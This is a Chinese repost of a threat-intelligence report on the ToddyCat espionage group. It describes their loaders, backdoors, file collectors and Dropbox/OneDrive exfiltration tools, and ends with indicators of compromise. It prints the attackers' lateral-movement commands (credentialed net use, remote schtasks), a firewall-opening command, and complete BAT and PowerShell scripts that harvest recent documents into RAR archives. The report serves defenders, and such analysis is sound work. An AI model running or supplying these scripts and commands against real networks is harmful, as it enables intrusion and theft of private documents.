ToddyCat 是我们在去年的一份出版物中描述的高级 APT 攻击者。该组织于 2020 年 12 月开始活动,负责对欧洲和亚洲知名实体进行多组攻击。
我们的第一篇出版物重点介绍了他们的主要工具:Ninja Trojan 和 Samurai Backdoor,我们还描述了用于启动它们的加载程序集。我们描述了攻击者如何利用 Microsoft Exchange 中的漏洞破坏公开暴露的服务器,他们如何通过发送恶意加载程序来瞄准桌面,以及他们如何使用多阶段加载方案保证其持久性。
去年,我们发现了一套从头开始开发的新加载程序,并收集了有关其利用后活动的更多信息。发现的信息使我们能够扩展对该组织的了解,并获得有关攻击者 TTP(战术、技术和程序)的新信息。在本文中,我们将介绍他们的新工具集、用于窃取和泄露数据的恶意软件,以及该组织用于横向移动和进行间谍活动的技术。
工具集
标准装载机
加载程序是由 rundll32.exe 调用的 64 位库,或者使用合法且经过签名的可执行文件进行侧面加载。这些组件在感染阶段用于加载 Ninja 木马作为第二阶段。我们已经看到了这些新装载机的三种变体:
第一个变体是通过诸如 update.dll 或 x64.dll 之类的文件名观察到的,并且通常使用合法的 rundll32.exe Windows 实用程序加载。大多数恶意代码驻留在 DllMain 中,但下一阶段是使用导出函数Start调用的。另外两个变体应该使用合法的 VLC.exe 媒体播放器加载,该播放器被滥用来旁加载恶意库。
加载程序通过从应存在于同一目录中的另一个文件加载加密的有效负载来开始其活动。然后使用 XOR 对加载的数据进行解码,其中 XOR 密钥是使用一种不寻常的技术生成的。该恶意软件使用静态种子通过洗牌和添加操作生成 256 字节的 XOR_KEY 块。
使用另一个嵌入的 64 字节 IDX 块作为索引再次对生成的 XOR_KEY 块进行混洗,以获得特定的 256 字节 XOR 密钥。XOR 密钥用于解密文件内容,并将结果值加载到内存中。
变体Update A和VLC A在其进程地址空间中加载下一阶段,解密的有效负载应该是一个导出具有特定名称的函数的库:“Start”或“_”,具体取决于变体。
变体VLC B创建一个新的wusa.exe(Windows Update Standalone Installer)进程,它是位于 System32 目录中的合法 Windows 程序。然后,它将解密的有效负载注入到远程进程地址空间的地址空间中,并使用CreateRemoteThread函数运行它。
定制装载机
在我们的调查过程中,我们注意到,在某些目标上,攻击者用另一种变体替换了标准加载程序,我们称之为定制加载程序,因为加密文件是针对特定系统量身定制的。
该代码类似于标准加载程序 - 变体 VLC A。主要区别在于加密文件的位置和文件名:
%CommonApplicationData%Localuser.key
以及用于获得最终有效负载的解密方案。
它采用与上述相同的算法,其中 XOR_SEED 用于生成 256 字节 XOR_KEY 块,然后使用另一个嵌入式 64 字节 IDX 块进行混合。在混合两个块之前,恶意软件会收集PhysicalDrive0存储属性以获取驱动器模型。
用于获取存储属性的代码片段
并使用GetVolumeNameForVolumeMountPointA函数检索“C:”卷 GUID。
用于获取卷 GUID 的代码片段
这两个值连续用作 XOR 密钥来修改 IDX 块。这种方法表明存储在 user.key 中的加密有效负载是为目标系统量身定制的。根据我们的观察,我们认为定制的加载程序是用来保持长期持久性的。用于实现此目标的技术与威胁参与者的 Samurai 后门所使用的技术相同,该后门允许攻击者将恶意软件隐藏在 svchost.exe 地址空间中。
在这种情况下,攻击者创建以下注册表项:
Registry Key: HKLMSOFTWAREMicrosoftWindows NTCurrentVersionSvcHost
Value name: fontcsvc
Value: FontCacheSvc
此注册表项旨在强制合法的 svchost.exe 进程在系统启动期间加载 FontCacheSvc 服务。该进程的命令行将如下所示:
C:Windowssystem32svchost.exe -k fontcsvc -s FontCacheSvc
攻击者还创建一个新服务,该服务被配置为加载定制的加载程序,该加载程序通常以文件名apibridge.dll存储。
Registry Key: $HKLMSystemControlSetServicesFontCacheSvcParameters
Value name: ServiceDll
Value: %ProgramFiles%Common FilesSystemapibridge.dll
Registry Key: $HKLMSystemControlSetServicesFontCacheSvcParameters
Value name: ServiceMain
Value: Start
Ninja
由前面描述的组件加载的最后阶段是 Ninja 代理。这是用 C++ 编写的复杂恶意软件,可能是 ToddyCat 开发的未知后利用工具包的一部分。我们在之前的出版物中对此进行了描述:
该代理是一个强大的工具,提供各种功能,包括但不限于:
- 运行进程的枚举和管理;
- 文件系统管理;
- 管理多个反向shell会话;
- 将代码注入任意进程;
- 在运行时加载附加模块(可能是插件);
- 在 C2 和远程主机之间转发 TCP 数据包的代理功能。
最新版本的代理支持与上一份报告中所述相同的命令,但配置不同。虽然以前的版本使用 XOR 密钥 0xAA 混淆了嵌入式配置,但新版本出于相同目的使用 NOT 二进制运算。
尽管配置中包含的信息保持不变,但互斥体名称已移至 HTTP 标头之后。
LoFiSe
这是一个旨在查找和收集目标系统上感兴趣的文件的组件。名称 LoFiSe 源自此工具使用的互斥体名称(“MicrosoftLocalFileService”)。该工具本身是一个名为DsNcDiag.dll的 DLL 文件,使用 DLL 侧面加载技术启动。使用软件包 Pulse Secure Network Connect 8.3 中具有数字签名和原始名称nclauncher.exe的合法可执行文件作为加载程序。受攻击的系统上已知以下路径和文件名:
- C:Program FilesWindows MailAcroRd64.exe
- C:Program FilesWindows MailDsNcDiag.dll
- C:Program FilesCommon FilesVLCMediaVLCMediaUP.exe
- C:Program FilesCommon FilesVLCMediaDsNcDiag.dll
启动后,LoFiSe 开始跟踪文件系统的变化。系统中的所有驱动器均受到监控。收到文件创建或修改事件后,该工具会执行多项检查。它会过滤大小超过 6400000 字节 (~6 MB) 的文件。某些文件夹中的文件也会被过滤。这些都是在其完整路径中包含 ProgramData 的文件,或者已存储在 LoFiSe 工作目录中的文件。
以下是已知该工具存储其文件的工作目录,具体取决于版本:
- C:ProgramdataMicrosofts
- C:windowstemp
在下一阶段,将根据以下掩码检查文件扩展名:
*.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.pdf, *.rtf, *.tif, *.odt, *.ods, *.odp, *.eml, *.msg
如果文件已通过所有检查并且适合收集,则 LoFiSe 会计算其 MD5 哈希值,用于检查以前复制的文件,并将此信息存储在数据库中。在该工具的所有已知版本中,在工作目录中创建名为 Date.db 的数据库文件。数据库中添加了两个表:
数据库中的文件路径
其他存储的数据
如果文件MD5不在表中,则将其添加到工作目录中。
每三个小时,LoFiSe 就会将工作目录中的所有文件收集到受密码保护的 ZIP 存档中,并将其放入单独的文件夹中以进行进一步的渗透:
准备收集的数据时生成的日志
DropBox上传器
这是一个通用的 DropBox 上传器,任何人都可以使用它来将数据上传到流行的文件托管服务。该工具可能并非 ToddyCat 独有,但我们观察到该组织使用它来窃取被盗文件。
这个小实用程序接受 DropBox 用户访问令牌作为参数。然后它解析当前工作目录并上传具有以下扩展名的文件:
.z;.001;.002;.003;.004;.005;.006;.007;.008;.009;.010;.011;.012;.013;.014;.015
在我们的调查过程中,我们还发现了其他几个类似的样本,这些样本受到不同包装的保护,并且仅在东南亚被发现。然而,在某些情况下,该工具是在未明显受到 ToddyCat 感染的系统上发现的。
Pcexter
这是另一个用于将存档文件泄露到 Microsoft OneDrive 的上传程序。该工具以名为Vspmsg.dll的 DLL 文件形式分发,该文件使用 DLL 侧面加载技术执行。作为加载程序,该工具使用 Visual Studio 中的合法可执行文件VSPerfCmd,该文件用于收集性能数据。这些可执行文件在受攻击系统上暂存的已知路径是:
- c:windowstempgoogledrivefs.exe
- C:windowstempvspmsg.dll
- c:program fileswindows mailsecurityhealthsystray64.exe
- c:program fileswindows mailvspmsg.dll
- c:program filescommon filesvlcmediavlcmediastatus.exe
- c:program filescommon filesvlcmediavspmsg.dll
该工具需要以下参数:
启动后,Pcexter 等待事件“GlobalSystemLocalPcexter”触发,然后开始使用给定掩码在指定目录中搜索文件。这是 LoFiSe 工具在创建要发送的存档时设置的事件。
Pcexter 使用 OneDrive OAuth 2.0 授权,检索访问令牌并通过 POST 方法发送文件:
Method: POST
URL: https://login.microsoftonline.com/common/oauth2/v2.0/token
Content-Type: application/x-www-form-urlencoded;
Expect: 100-continue
client_id=&scope=offline_access%20files.readwrite.all
refresh_token=&redirect_uri=https://login.microsoftonline.com/common/oauth2/nativeclient&grant_type=refresh_token
其他工具
被动UDP后门
这是一个微小的被动后门,它接收带有 UDP 数据包的命令。攻击者在执行此后门之前通常会通过任务远程执行以下命令:
cmd /c start /b netsh advfirewall firewall add rule name="SGAccessInboundRule" dir=in protocol=udp action=allow localport=49683
此命令在目标主机上创建名为SGAccessInboundRule 的新防火墙规则。它允许后门在端口49683上接收UDP数据包。运行该命令后,攻击者执行后门:
c:programdatamicrosoftnetworkaspnet.exe 49683
该后门的逻辑很简单:它将UDP套接字绑定到指定端口,解压缩接收到的数据,并使用WinExec函数执行结果字符串。一旦命令被执行,后门就会通过返回包含当前系统时间和已执行命令的消息来发送有关命令执行的反馈。但是,后门不提供命令的输出。
目前尚不清楚该后门的确切目的,但它可能用于在检测到其他植入程序时提供额外的持久性。
CobaltStrike
在我们的调查过程中,我们观察到攻击者在部署 Ninja 代理之前使用了 CobaltStrike。具体来说,我们观察了使用 C++ 编写的加载程序的使用情况,该加载程序位于:
C:ProgramDataMicrosoftmfwindef.dll
该恶意软件加载名为“BIN”的嵌入式资源。使用 XOR 算法和代码中嵌入的密钥对资源内容进行反混淆:B0 9A E4 EA F7 BE B7 B0。
生成的有效负载是 CobaltStrike 信标,配置为与以下 URL 进行通信:
hxxps://www.githubdd.workers[.]dev/fam/mfe?restart=false
感染后大约 10 分钟,系统上检测到 ToddyCat Ninja。
后利用
最新发现证实,ToddyCat 攻击其目标是为了执行间谍活动。为了实现这一目标,攻击者使用上述加载程序和木马等工具渗透企业网络。一旦获得立足点,它就会开始收集有关连接到同一网络的主机的信息,以查找可能包含感兴趣文件的目标。
该小组利用标准操作系统管理实用程序(例如 net 和 ping)执行发现活动、枚举域帐户和 DC 服务器:
net group "domain admins" /dom
net user %USER% /dom
net group "domain computers" /dom | findstr %VALUABLE_USER%
ping %REMOTE_HOST% -4
识别潜在目标后,该组织通过使用受损的域管理员凭据在本地安装网络共享来横向移动:
net use \%REMOTE_HOST%c$ "%PASSWORD%" /user:%USER%
net use \%IP_ADDRESS%c$ "%PASSWORD%" /user:%USER%
攻击者会注意随着时间的推移轮换所使用的凭据;相同的凭证不太可能长期使用。
复制脚本后,将创建、执行计划任务并立即与网络共享一起删除,所有这些都针对每个目标主机循环进行:
schtasks /s %REMOTE_HOST% /tn %TASK_NAME% /u %DOMAIN%%USER% /p %PASSWORD% /create /ru system /sc DAILY /tr "%COMMAND%" /f
schtasks /run /s %REMOTE_HOST% /tn %TASK_NAME% /u %USER% /p "%PASSWORD%" /i
schtasks /delete /s %REMOTE_HOST% /tn %TASK_NAME% /u %USER% /p "%PASSWORD%" /f
net use \%IP_ADDRESS%c$ /del /y
计划任务通常可以包含单个发现命令、二进制调用或负责执行收集活动的 PS1 或 BAT 脚本。
在横向移动过程中,单命令计划任务的输出会保存在特定文件中,以便将远程驱动器挂载为本地共享的攻击者可以捕获该输出:
Get process list
"cmd" /c start /b tasklist /v >> c:userspublicd
Get information about bootable drives
cmd /c start /b powershell -c Get-WmiObject -Query {SELECT * FROM Win32_DiskPartition WHERE Bootable = TRUE} >> c:userspublicd
Get remove drive model, vendor name and serial number
cmd /c start /b wmic diskdrive where Name="\.PHYSICALDRIVE0" get model,name,SerialNumber >> c:userspublicd
Get systeminfo
cmd /c start /b systeminfo >> c:userspublicd
Check current TCP ports status
cmd /c netstat -anop tcp >> c:userspublicd
Test internet connection
cmd /c ping 8.8.8.8 -n 2 >> c:userspublicd
Check if Kaspersky endpoint is running on remote host
cmd /c wmic process where name="avp.exe" get processid,executablepath,name,creationdate,CommandLine >> C:userspublicd
Indicator removal
cmd /c start /b del c:programdataintel%.SCRIPT_NAME%.ps1
Moving to the root directory using impacket wmiexec
cmd.exe /Q /c cd 1> \127.0.0.1ADMIN$__%TIMESTAMP% 2>&1
在运行脚本的情况下,命令如下。然后我们观察到 PS1 脚本中发现的相同 PowerShell 命令被包装在 BAT 脚本中,大概是为了避免检测。
然而,某些文件夹似乎比其他文件夹更受青睐:
cmd /c start /b powershell.exe -exec bypass -c "c:programdataintel%SCRIPT_NAME%.ps1" %INTEGER%
c:userspublic%SCRIPT_NAME%.bat
"cmd" /c start /b powershell.exe -exec bypass ". "c:userspublic%SCRIPT_NAME%.ps1"" > c:userspublicd
组在同一会话中重复使用相同的任务名称;通常选择这样的名称是为了减少怀疑,例如“one”和“tpcd”,而脚本名称可以从两到四个具有较高熵的随机键盘行走字符变化。
活动结束时,将在渗透主机上安装临时共享,然后将其删除:
net share tmp=c:windowsdebug /grant:everyone,full
net share tmp /del /y
数据收集和泄露
如上一节所述,一旦确定了感兴趣的目标,收集阶段就开始了。威胁行为者通常从许多不同的主机收集文件并将它们存储在档案中,然后使用公共文件存储服务从目标网络中窃取这些档案。
数据盗窃计划
我们已经描述了一些专门为识别和收集感兴趣的文件而开发的工具,例如 LoFiSe,但在调查过程中,我们还发现了 ToddyCat 使用的其他脚本,用于使用 WMI 枚举目标主机磁盘上的文件并收集最近修改的文档.pdf、.doc、.docx、.xls 和 .xlsx 扩展名。
在这些情况下,使用 7zip 或 RAR 实用程序等工具进行压缩;具体工具可能是根据基础设施中已有的工具来选择的。与 LoFiSe 不同,收集脚本将枚举文档的路径存储在纯文本 TXT 文件中。文档压缩可以直接在目标主机或渗漏主机上完成。
以下是在目标主机上运行的 BAT 脚本的内容:
@echo off
mkdir c:userspublictmp_ >nul 2>nul
powershell.exe "Get-Wmiobject -Class Win32_logicaldisk | where size -gt 0 | select-object -ExpandProperty DeviceID >> c:userspublictmp_disk.txt"
powershell.exe "get-content c:userspublictmp_disk.txt | foreach {if ($_ -eq "C:"){dir users -Exclude "tmp_" | %%{dir $_.FullName -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt (Get-date).AddDays(-4) | %%{$_.FullName} >> c:userspublictmp_ph.txt} } else{dir $_ -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt (Get-date).AddDays(-20) | %%{$_.FullName} >> c:userspublictmp_ph.txt}}"
powershell.exe "get-content c:userspublictmp_ph.txt | copy-item -Destination c:userspublictmp_ -Force -ErrorAction SilentlyContinue" >nul 2>nul
if EXIST C:"Program Files"WinRAR (
C:"Program Files"WinRARrar.exe a -v200m c:userspublictmp_.rar c:userspublictmp_ -ep >nul 2>nul
rmdir /s /q c:userspublictmp_
) else if exist C:"Program Files (x86)"WinRAR (
C:"Program Files (x86)"WinRARrar.exe a -v200m c:userspublictmp_.rar c:userspublictmp_ -ep >nul 2>nul
rmdir /s /q c:userspublictmp_
)
exit
在上面的示例中,文件存档在 tmp_ 文件夹中;我们还观察到使用根据主机名参数化名称的文件夹,例如:
c:intel%hostname%
收集的文件也是根据其最后写作时间来选择的。文件的上次修改日期应大于特定天数。该数字通常作为脚本参数传递,并且可以进行硬编码(如前面的示例所示)。
在主驱动器和辅助驱动器上选择数据源时,收集脚本使用不同的策略。对于默认的 Windows 主驱动器,该脚本会遍历用户配置文件目录 (C:Users)。这种方法增加了捕获有价值数据的可能性,同时减少了所需的处理时间并最大限度地减少了收集不需要的文件的机会。当处理外部设备和其他非主存储介质时,脚本通过选择根目录()来选择更方便的策略。虽然主驱动器始终可用,但辅助驱动器可能并不总是可访问,从而限制了收集机会。为了缓解此限制,威胁行为者有时会扩展时间范围,将辅助驱动器和可移动驱动器上的旧文件包含在其范围内(如 BAT 片段中所示)。
以下是 PS1 脚本的结构:
[int] $res = 0
if(!(($args.count -eq 1) -and ([int]::TryParse($args, [ref]$res)))){
exit
}
$lte = (Get-date).AddDays(-$res)
$hostname = $env:computername + "_"
$pt=Split-Path -Parent $MyInvocation.MyCommand.Definition
if (!(Test-Path -path "$env:tmp\$hostname")){
mkdir "$env:tmp$hostname"
}
$d = Get-Wmiobject -Class Win32_logicaldisk | where size -gt 0 | select-object -ExpandProperty DeviceID
foreach($i in $d){
if ($i -eq "C:"){
$fp1 = dir c:\users -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt $lte | sort LastWriteTime -Descending | %{$_.FullName}
write-output $fp1 >> "$env:tmp$hostnamepath.txt"
$fp1 | copy-item -Destination "$env:tmp$hostname" -Force -ErrorAction SilentlyContinue
} else{
$fp2 = dir $i -File -Recurse -Include '*.pdf', '*.doc', '*.docx', '*.xls', '*.xlsx' | where LastWriteTime -gt $lte | sort LastWriteTime -Descending | %{$_.FullName}
write-output $fp2 >> "$env:tmp$hostnamepath.txt"
$fp2 | copy-item -Destination "$env:tmp$hostname" -Force -ErrorAction SilentlyContinue
}
}
C:'Program Files'WinRARrar.exe a -v200m "$env:tmp$hostname.rar" "$env:tmp$hostname" -ep
remove-item -path "$env:tmp$hostname" -Recurse
move-item -path "$env:tmp$hostname.*" "$pt" -Force -ErrorAction SilentlyContinue
攻击者试图通过保护脚本并使用将脚本代码嵌入到 PE“.text”部分中的特定植入程序来分发脚本来逃避防御。
执行文件内的 PowerShell 脚本
释放器接收两个参数;第一个是启动执行时必须提供的密码字符串,第二个是实际通过命令行传输到 PS 脚本的数字。启动后,释放器会创建一个名为pro.ps1的文件并通过 PowerShell 执行它:
c:userspublicmfc.exe letgo 3
powershell.exe -windowstyle hidden -exec bypass "c:userspublicpro.ps1" 3
将它们包含在压缩档案中。在这些情况下,参与者使用标准远程任务执行技术在远程主机上执行脚本。然后使用 xcopy 实用程序将收集的文件手动传输到渗漏主机,最后使用 7z 二进制文件进行压缩:
xcopy \%hostname%c$programdataintel c:intel%hostname% /f /s /h
7z64 a %hostname%.z %hostname% -v200m
然后,该活动继续使用上述工具之一、Pcexter 或 Dropbox 上传程序进行实际渗漏:
db_org.exe %Dropbox Auth Bearer%
ToddyCat 的妥协指标
装载机
97D0A47B595A20A3944919863A8163D1 变体“Update”
828F8B599A1CC4A02A2C3928EC3F5F8B 变体“VLC” A
90B14807734045F1E0A47C40DF949AC4 变体“VLC” B
0F7002AACA8C1E71959C3EE635A85F14 定制装载机
D3050B3C7EE8A80D8D6700624626266D 定制装载机
D4D8131ED03B71D58B1BA348F9606DF7 定制装载机
被动UDP后门
65AF75986577FCC14FBC5F98EFB3B47E
Dropbox 过滤器
BEBBEBA37667453003D2372103C45BBF
LoFiSe
14FF83A500D403A5ED990ED86296CCC7
4AD609DDDF2C39CDA7BDBE2F9DC279FD
Pcexter
D0CD88352638F1AE101C2A13356AB6B7
318C16195F62094DADCC602B547BBE66
Dropper
C170F05333041C56BCC39056FECB808F
文件路径
C:Program FilesWindows MailAcroRd64.exe LoFiSe启动器
C:Program FilesWindows MailDsNcDiag.dll LoFiSe
C:Program FilesCommon FilesVLCMediaVLCMediaUP.exe LoFiSe启动器
C:Program FilesCommon FilesVLCMediaDsNcDiag.dll LoFiSe
C:windowstempgoogledrivefs.exe Pcexter启动器
C:windowstempvspmsg.dll Pcexter
c:program fileswindows mailsecurityhealthsystray64.exe Pcexter启动器
c:program fileswindows mailvspmsg.dll Pcexter
c:program filescommon filesvlcmediavlcmediastatus.exe Pcexter启动器
c:program filescommon filesvlcmediavspmsg.dll Pcexter
C:userspublicmfc.exe Dropper
C:WindowsSystem32up.dll Loader简单更新
C:WindowsSystem32x64.dll Loader简单更新
C:Intelx64.dll Loader简单更新
C:Perflogs1.dll Loader简单更新
C:ibmsgtkx64.dll Loader简单更新
C:WindowsDebug1.dll Loader简单更新
C:vlcmedialibvlc.dll Loader Simple VLC–wusa.exe注入
C:restoreslibvlc.dll Loader Simple VLC
C:Users%User%libvlc.dll Loader Simple VLC
C:WindowsSystem32libvlc.dll Loader Simple VLC
C:Intellibvlc.dll Loader Simple VLC
C:Program FilesCommon Filesvlcmedialibvlc.dll Loader Simple VLC–wusa.exe注入
C:Program FilesCommon FilesSystemapibridge.dll 量身定制的装载机
C:Systemapibridge.dll 量身定制的装载机
c:windowsdebugaspnet.exe 被动UDP后门
C:Microsoftnetworkaspnet.exe 被动UDP后门
C:ProgramDataMicrosoftNetworkaspnet.exe 被动UDP后门
c:windowsdebugsvl.exe 被动UDP后门–不持久
C:Inteldb_org.exe DropBox DropBox上传程序
C:Debugdb_org.exe DropBox DropBox上传程序
C:UsersPublicDownloadsDB_SIMPLE.exe DropBox DropBox上传程序
C:ProgramDatadb_org.exe DropBox DropBox上传程序
C:ProgramDataMicrosoftXboxLivedb_org.exe DropBox上传程序
C:ProgramDataVLCMediaplaylist.dat 加密有效负载
C:WindowsSystem32update.bin 加密有效负载
C:ibmsgtkupdate.bin 加密有效负载
C:Intelupdate.bin 加密有效负载
C:WindowsDebugupdate.bin 加密有效负载
C:Perflogsupdate.bin 加密有效负载
C:Intelplaylist.dat 加密有效负载
C:restoresplaylist.dat 加密有效负载
C:WindowsSystem32playlist.dat 加密有效负载
C:ProgramDataLocaluser.key 加密有效负载
Domains
solitary-dawn-61af.mfeagents.workers[.]dev Ninja C2
www.githubdd.workers[.]dev CobaltStrike C2
URLs
hxxps://solitary-dawn-61af.mfeagents.workers[.]dev/collector/3.0/ Ninja C2
hxxps://www.githubdd.workers[.]dev/fam/mfe?restart=false CobaltStrike C2
注册表项
$HKLMSystemControlSetServicesFontCacheSvc
互斥体
MicrosoftLocalFileService
事件
GlobalSystemLocalPcexter
转载来源:https://securelist.com/toddycat-keep-calm-and-check-logs/110696/
图片来源网络侵权可联系删除